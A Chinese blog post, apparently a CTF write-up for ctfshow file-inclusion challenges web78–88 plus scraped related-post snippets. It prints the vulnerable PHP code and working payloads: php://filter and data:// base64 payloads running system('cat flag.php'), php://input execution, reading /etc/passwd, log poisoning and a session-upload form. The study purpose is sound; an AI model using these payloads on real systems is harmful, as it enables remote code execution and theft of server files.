【从0开始学web】78-88 文件包含

最新推荐文章于 2024-07-04 14:42:56 发布
最新推荐文章于 2024-07-04 14:42:56 发布
阅读量3.6k 收藏 3
点赞数 3
分类专栏: CTF系列问题 php 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/120774737
版权

【从0开始学web】78-88 文件包含

文件包含题,可以先了解一下文件包含漏洞

https://blog.csdn.net/yzl_007/article/details/120261435

web78

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

php://filter 伪协议 读取,条件:allow_url_include = on

payload:?file=php://filter/convert.base64-encode/resource=flag.php

php://input 协议

image-20211014220330421

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。

注:当enctype=”multipart/form-data”时,php://input是无效的。

参考:https://www.cnblogs.com/endust/p/11804767.html

web79

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

将php替换成???

?file=php://filter/convert.base64-encode/resource=flag.php php:// 会被替换,用不了,就用input:// 吧

str_replace 函数 区分大小写,可以大小写绕过,将上一题的php改为PHP即可

image-20211014222943856

或者php://data 协议 ,将命令转义成base64

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

web80

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

将data也替换 ,data://也用不了了,继续php://input

在这里插入图片描述

web81

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

冒号也被过滤了,伪协议用不了,日志包含getshell

?file=/etc/passwd 是可以回显的,再查看一下能不能找到日志

在这里插入图片描述

?file=/var/log/nginx/access.log 也是存在回显的

在这里插入图片描述

然后日志注入

在这里插入图片描述## web82

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);

禁用的data、php、:、. 多禁用了一个点,虽然访问不到access.log ,换个思路了得,只能找一个不带.路径的文件,所以选择了session会话文件,可以先了解一下下面这篇文章:利用session.upload_progress进行文件包含

如下代码构造一个上传的攻击,

#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>

在这里插入图片描述

然后再不断请求

这里参考这篇文章吧,https://www.cnblogs.com/NPFS/p/13795170.html ,没实验成功。。。

web83-86 (未完待续)

web87

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

参考:https://www.leavesongs.com/PENETRATION/php-filter-magic.html#_2 暂时没做出来

web88

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

没用过滤 :

payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOz8+ 查看目录

要注意的是这里 + 、 = 都是被过滤的,记得去掉

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4 查看flag

在这里插入图片描述

web116

打开是一个视频

在这里插入图片描述

下载下来,分离出图片源码

在这里插入图片描述

用的是file_get_contents(后续补充)所以,直接 输入file=flag.php就可以过

在这里插入图片描述

web117

#持续更新

yyyyzzzllll
关注
专栏目录
文件漏洞题目搜集
Devil_B的博客
05-14 692
百度杯”CTF比赛 2017 二月场 没错!就是文件包含漏洞。 <?php show_source(__FILE__); if(isset($_REQUEST['path'])){ include($_REQUEST['path']); }else{ include('phpinfo.php'); } 题目内容: 没错!就是文件包含漏洞。 解题知识点: 文件包含:服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时
南邮平台 文件包含漏洞题
qq_41497476的博客
05-24 441
当无法判断allow_url_fopen,allow_url_include的开启状态时,可逐一尝试如下的请求判断哪些能够执行 1.?file=data:text/plain,<?php phpinfo()?> 2.?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= 3.?file=php://input...
文件包含题型
我了解豹女就像农民伯伯了解大米
06-27 279
可以看到有file关键词可以进行php伪协议: 使用file伪协议查看/etc/passwd ?file=file:///etc/passwd http://192.168.129.128:83/vulnerabilities/fu1.php?file=file:///etc/passwd 使用php://input伪协议去查看ls / ?file=php:input (Post Data) <?php phpinfo()?> http://192.168.129.1..
WEB:题目名称-文件包含
sleepywin的博客
07-19 587
用 bp爆破,暴力破解 intruder 模块有个“cluster bomb” (集束炸弹)模式,可以把上面所有的 16 个字符集格式做一个笛卡尔积,生成 256(16 *16)个请求。",可以推测 "base64" 字符串在黑名单里。,比如 iconv("ASCII", "UTF-8", $string),也就是说。convert.iconv 相当于用了 iconv() 函数,这个函数是。,拿到数据之后,再把它的字符集转回来就行了。构造payload尝试读取flag.php。爆破完成后可发现flag。
文件包含漏洞三道题
qz362228的博客
05-04 1791
1.绕过require_once限制 题目页面: 有两个require_once,则this_is_flag.php已经被包含一次就不会再包含了。而题目意思就是说flag在this_is_flag.php文件中。所以要想绕过前面那个require_once,而执行后面那个。在浏览器中搜索绕过require_once限制 因为知道文件路径,所以最后是/www/html/file_include/Assess01/this_is_flag.php ?url=/proc/self/root/proc/self/r
CTF之web习记录 -- 文件包含
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
ctfshow web78-web81文件包含漏洞 wp
qq_56158055的博客
01-16 4248
事先声明,本文只用来习交流,不参与以任何商业形式的活动。本文不会出现flag。 web78 啥都没过滤,直接用php伪协议查看flag.php 解码得出flag web79 通过替换函数,将php换成了???,可以换一个php的伪协议绕过,用data伪协议 web80 这里把data也给过滤了,所有换一个伪协议,用input伪协议 然后查看f10g.php就能得到flag web81 这下把:这过滤了,伪协议是用不...
【愚公系列】2024年03月 《CTF实战:从入门到提升》 009-Web安全入门(PHP文件包含漏洞)
热门推荐
时光隧道
03-01 6万+
PHP文件包含漏洞是指在PHP代码中存在安全漏洞,允许攻击者包含并执行恶意文件或代码。PHP文件包含漏洞通常发生在以下两种情况下:动态文件包含:当PHP代码使用动态输入来包含文件时,攻击者可能通过构造恶意输入来包含并执行任意文件。这可能会导致攻击者执行远程代码、读取服务器上的敏感文件,或者执行其他恶意操作。本地文件包含:当PHP代码使用本地文件路径来包含文件时,攻击者可能通过修改文件路径参数来包含并执行任意文件。这可能会导致攻击者读取服务器上的敏感文件,或者执行其他恶意操作。
WEB-Node-Angular-HTML-CSS-:html文件
06-24
这些文件包含了HTML标签,它们告诉浏览器如何呈现网页内容。例如,`<html>`标签定义了整个HTML文档的开始,`<head>`标签包含了元数据(如标题和样式表链接),而`<body>`标签则包含用户在浏览器窗口中看到的实际内容...
Complete-Web-Development-Bootcamp:在这里,我上传了我在整个Web开发过程中所的所有知识
04-02
在【压缩包子文件的文件名称列表】"Complete-Web-Development-Bootcamp-main"中,虽然具体文件内容未知,但我们可以推测这可能是一个包含整个课程结构的主目录。通常,这样的目录会包括课程大纲、笔记、代码示例、...
java代码审计文件包含_代码审计--一道简单的文件包含题目的多种利用方式
weixin_28689507的博客
03-02 602
不知出自哪次CTF前言:本萌新最近在习代码审计,有一天在水群聊到代码审计如何习,然后某dalao丢给我一道题,说你对这题有什么看法,本萌新一看,这不是很简单吗,想也没多想就直接上去?file=flag.php,然后被dalao指教了一番,于是就有了这篇文章。目录:NO.1 传统方法首先来看下代码error_reporting(0);if(@isset($_GET["file"])){inclu...
文件包含练习1
qq_61109509的博客
02-07 1101
大佬文章
以题为例浅谈文件包含(1),聪明人已经收藏了
m0_60607536的博客
04-09 581
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
文件包含总结
weixin_48427966的博客
04-24 910
>、空格、汉字 等字符不符合base64编码的字符范围将被忽略,所以最终被解码出来的的字符就变成 “phpdie” 和 我们传入的$content的值。发现过滤的还是比较多,但是没有过滤: ,那我们就可以使用PHP伪协议就是 这里使用的是 data://text/plain;众所周知,base64编码中只包含64个可打印字符,而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。3、将php和data替换为?4、将php和data替换为?
CTF---Web---文件包含---05---base64+路径
qq_22160557的博客
07-28 1116
文章目录前言一、题目描述二、解题步骤1、御剑扫描2、查看源码3、判断后缀4、路径构造5、base64解码三、总结 前言 题目分类: CTF—Web文件包含—05—base64+路径 一、题目描述 题目: 172.16.15.186/stage/8/ 文件包含 二、解题步骤 1、御剑扫描 Step1:御剑扫描,得到robots.txt文件,既而得到ge_t_key.php 2、查看源码 直接去访问172.16.15.186/stage/8/ge_t_key.php,发现内容为空,因为源码中没有echo
web入门-文件包含
wo41ge的博客
11-28 3343
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4300
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
CTFshow web入门——文件包含
小元砸的博客
02-07 4046
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
ctfshow-web入门-文件包含web78web79、web80、web81)
最新发布
Welcome To Myon'Blog !
07-04 1918
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值